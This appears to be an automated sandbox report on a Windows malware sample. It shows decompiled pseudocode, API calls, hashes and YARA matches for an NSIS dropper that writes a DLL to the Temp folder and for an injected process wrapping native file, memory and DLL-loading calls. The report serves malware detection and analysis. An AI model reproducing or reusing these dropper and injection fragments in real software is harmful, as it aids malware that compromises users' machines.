                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: TextWindow
                                                                          • String ID: 1033$obsolete Setup
                                                                          • API String ID: 530164218-3594488060
                                                                          • Opcode ID: 2e6dc91df21bd32c357a542dcf52ef06f39965d5d1ff0679fec69d0b837b48a4
                                                                          • Instruction ID: 80233f8be37abeb08f7c7b571dfb44847f9404f2ebf597b18c2e1cddc1fdd98f
                                                                          • Opcode Fuzzy Hash: 2e6dc91df21bd32c357a542dcf52ef06f39965d5d1ff0679fec69d0b837b48a4
                                                                          • Instruction Fuzzy Hash: 1B11D476B002119BC724BF56DC40E333BEDEB5476535881BBF801673A1DA3999068A59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404CBD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404CBD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
							return CallWindowProcA( *0x42a894, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404643(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059DB(0x42a8a0, 0x430000);
								E00405939(0x430000, _t23);
								E00401410(6);
								E004059DB(0x430000, 0x42a8a0);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403E0F(0x413);
					return 0;
				}
				goto L12;
			}





                                                                          0x00404cc9
                                                                          0x00404ce6
                                                                          0x00404cea
                                                                          0x00404cec
                                                                          0x00404cec
                                                                          0x00404cec
                                                                          0x00404cf3
                                                                          0x00404cff
                                                                          0x00404d1f
                                                                          0x00000000
                                                                          0x00404d01
                                                                          0x00404d04
                                                                          0x00404d0a
                                                                          0x00404d0c
                                                                          0x00404d5f
                                                                          0x00404d5f
                                                                          0x00404d62
                                                                          0x00000000
                                                                          0x00404d72
                                                                          0x00404d18
                                                                          0x00404d1a
                                                                          0x00404d22
                                                                          0x00404d22
                                                                          0x00404d25
                                                                          0x00404d27
                                                                          0x00404d2d
                                                                          0x00404d3c
                                                                          0x00404d42
                                                                          0x00404d49
                                                                          0x00404d50
                                                                          0x00404d57
                                                                          0x00404d5c
                                                                          0x00404d2d
                                                                          0x00000000
                                                                          0x00404d25
                                                                          0x00404cff
                                                                          0x00404ccf
                                                                          0x00404cda
                                                                          0x00000000
                                                                          0x00404cdf
                                                                          0x00000000

                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00404D04
                                                                          • CallWindowProcA.USER32 ref: 00404D72
                                                                            • Part of subcall function 00403E0F: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          • API String ID: 3748168415-3916222277
                                                                          • Opcode ID: 931c6e2d3452623f2a390e01c489404f436308da2a52d275820346ecfe2c3dce
                                                                          • Instruction ID: 4a2947fe1ef1853657b0cd68643acdbb852dff1bff70307e7b65a93a25d4428a
                                                                          • Opcode Fuzzy Hash: 931c6e2d3452623f2a390e01c489404f436308da2a52d275820346ecfe2c3dce
                                                                          • Instruction Fuzzy Hash: 11117CB1500208FBDF21AF12DC45A9B3B69AF84764F00813BFB18791E2C3784D519FA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405952(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                          0x0040253c
                                                                          0x0040253c
                                                                          0x0040253f
                                                                          0x0040255a
                                                                          0x00402541
                                                                          0x00402543
                                                                          0x00402548
                                                                          0x0040254f
                                                                          0x00402561
                                                                          0x004026da
                                                                          0x004026da
                                                                          0x00402567
                                                                          0x00402579
                                                                          0x004015c8
                                                                          0x004015ca
                                                                          0x00000000
                                                                          0x004015d0
                                                                          0x004015ca
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll, xrefs: 00402548, 0040256D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileWritelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll
                                                                          • API String ID: 427699356-3410690208
                                                                          • Opcode ID: 460f3d3385c81f9ab123a651ab7910130a28ee13f4182e9bce0e3a7b0b2bcfdd
                                                                          • Instruction ID: 58c959ba46dee6b8a5e8613f63768173e8f239850a52820b4ff069945e253713
                                                                          • Opcode Fuzzy Hash: 460f3d3385c81f9ab123a651ab7910130a28ee13f4182e9bce0e3a7b0b2bcfdd
                                                                          • Instruction Fuzzy Hash: 21F0B4B1A04245BFD710EBA59D19BAB3664AB00304F10043BB202B60C2C6BC49419B6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040552F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0040552F(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}





                                                                          0x00405530
                                                                          0x0040553a
                                                                          0x0040553c
                                                                          0x00405543
                                                                          0x0040554b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040554b
                                                                          0x0040554d
                                                                          0x00405551

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00405535
                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00405543
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 2709904686-1669384263
                                                                          • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                          • Instruction ID: 889218ce53f6b8cf1f9f6a2aaa16a781c12a56784fee4b43009738821d70e769
                                                                          • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                          • Instruction Fuzzy Hash: 29D0C9B2809EB0BAE31322149C04B9F7A999F5A710F4944A2F540B62E5D2785D818FEE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405640, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00405640(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                          0x0040564c
                                                                          0x0040564e
                                                                          0x00405676
                                                                          0x0040565b
                                                                          0x00405660
                                                                          0x0040566b
                                                                          0x00000000
                                                                          0x00405688
                                                                          0x00405674
                                                                          0x00405674
                                                                          0x00000000

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405647
                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                          • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 0040566E
                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405677
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                          • Instruction ID: 346b90764f0d90fbcc61368962881b27d577bfee3f98b87c3a37ae2f5c1fe9f2
                                                                          • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                          • Instruction Fuzzy Hash: 7EF02736209C91EFC2125B288C00A2B6A94EFA1311B540A7AF444F2140C33A9811ABBB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: LWlcpDjYIQ.exe PID: 3664 Parent PID: 5524 LWlcpDjYIQ.exeCOMMON

                                                                          Executed Functions

                                                                          Function 00418202, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E00418202(void* __eax, void* __ecx, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {

				asm("insb");
				if ( *[cs:ebx+ecx] - __eax < 0) goto L3;
			}



                                                                          0x00418209
                                                                          0x0041820f

                                                                          APIs
                                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: B=A$B=A$8A
                                                                          • API String ID: 2738559852-2917780145
                                                                          • Opcode ID: 654958f2de1cfe6c0cbab2c31897edbf7086abf97fc0b32ce801e5ffe1ae768b
                                                                          • Instruction ID: 0eea45d44e0cc7f5156784f2d421eb39e0053e172abca27bce3bfee465cb3f86
                                                                          • Opcode Fuzzy Hash: 654958f2de1cfe6c0cbab2c31897edbf7086abf97fc0b32ce801e5ffe1ae768b
                                                                          • Instruction Fuzzy Hash: 0221F7B2200208AFDB18DF99DC80EEB77A9AF8C754F15824DFA0D97241D634E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				intOrPtr _t13;
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _t13 + 0xc48;
				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}








                                                                          0x00418263
                                                                          0x0041826f
                                                                          0x00418277
                                                                          0x00418282
                                                                          0x0041829d
                                                                          0x004182a5
                                                                          0x004182a9

                                                                          APIs
                                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: B=A$B=A
                                                                          • API String ID: 2738559852-2767357659
                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                          0x00409b2c
                                                                          0x00409b2f
                                                                          0x00409b34
                                                                          0x00409b39
                                                                          0x00409b43
                                                                          0x00409b48
                                                                          0x00409b4b
                                                                          0x00409b4d
                                                                          0x00409b55
                                                                          0x00409b5a
                                                                          0x00409b5a
                                                                          0x00409b61
                                                                          0x00409b69
                                                                          0x00409b6c
                                                                          0x00409b6e
                                                                          0x00409b82
                                                                          0x00000000
                                                                          0x00409b84
                                                                          0x00409b8a
                                                                          0x00409b3e
                                                                          0x00409b3e
                                                                          0x00409b3e

                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                          0x004181bf
                                                                          0x004181c7
                                                                          0x004181fd
                                                                          0x00418201

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041838A, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E0041838A(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t22;

				asm("adc dword [ebp-0x75], 0xffffffec");
				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E00418DB0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}





                                                                          0x0041838f
                                                                          0x00418393
                                                                          0x0041839f
                                                                          0x004183a7
                                                                          0x004183c9
                                                                          0x004183cd

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: f7ad4340fd649b6b11a426841d4ca2019f10650c01c3bc93a28ed2c639964ce1
                                                                          • Instruction ID: 577d68ff40d8d0f95e355ab1b2da4c526b7cd67bcf4bc62983fef5628ca6c47c
                                                                          • Opcode Fuzzy Hash: f7ad4340fd649b6b11a426841d4ca2019f10650c01c3bc93a28ed2c639964ce1
                                                                          • Instruction Fuzzy Hash: 86F05E71200208AFCB14CF88DC80EEB73A8EF88354F148209FE1997281C630E810CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                          0x0041839f
                                                                          0x004183a7
                                                                          0x004183c9
                                                                          0x004183cd

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                          0x004182e3
                                                                          0x004182e6
                                                                          0x004182ef
                                                                          0x004182f7
                                                                          0x00418305
                                                                          0x00418309

                                                                          APIs
                                                                          • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A698F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a7135dc3db71b0ddbbd6337a84b692773aaa3db8ec3adf7391bd5761f7c35a1f
                                                                          • Instruction ID: de06ef428b3e9f0451531bbbdcc1b2b873ccd55260525c79bff139edc965d7f2
                                                                          • Opcode Fuzzy Hash: a7135dc3db71b0ddbbd6337a84b692773aaa3db8ec3adf7391bd5761f7c35a1f
                                                                          • Instruction Fuzzy Hash: 0190026160100502E20271694804616001A9BD0381F91C032A1055555ECA658992F171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
